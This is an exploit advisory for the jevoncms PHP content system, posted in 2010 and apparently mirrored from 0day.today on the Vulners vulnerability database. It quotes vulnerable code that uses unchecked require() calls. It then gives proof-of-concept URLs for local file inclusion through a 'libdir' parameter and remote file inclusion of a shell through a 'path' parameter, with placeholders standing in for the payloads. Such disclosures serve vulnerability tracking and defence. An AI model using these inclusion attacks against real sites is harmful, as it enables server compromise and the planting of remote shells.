Lucene search
K

jevoncms (libdir) Multiple Vulnerability

🗓️ 05 Apr 2010 00:00:00Reported by eidelweissType 
zdt
 zdt
🔗 0day.today👁 22 Views

jevoncms (libdir) Multiple Vulnerability in template and menu file

Code
========================================
jevoncms (libdir) Multiple Vulnerability
========================================

[+]Title : jevoncms (libdir) Multiple Vulnerability
[+]Version: -
[+]Download: http://sourceforge.net/projects/jevoncms/files/
[+]Author: eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com

 [!]Thank`s To: all friends

########################################################

 -=[ Vuln C0de ]=-
***************************
[-] jevoncms/php/main/jevoncms.php

$_PHPLIB["libdir"] = "phplib/";
require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");

***************************
[-] jevoncms/php/main/template/jvc_template.php

if($type!=$lasttype && $type!=''){
  $path= "php/".$type."/".$type.".php" ;
 // echo $path;
  require($path);

***************************
[-] jevoncms/php/menu/menu.php

//require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */

***************************

 -=[ Proof Of Concept ]=-


 http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]

 http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]

 http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]

######################=[E0F]=#############################



#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Apr 2010 00:00Current
7.1High risk
Vulners AI Score7.1
22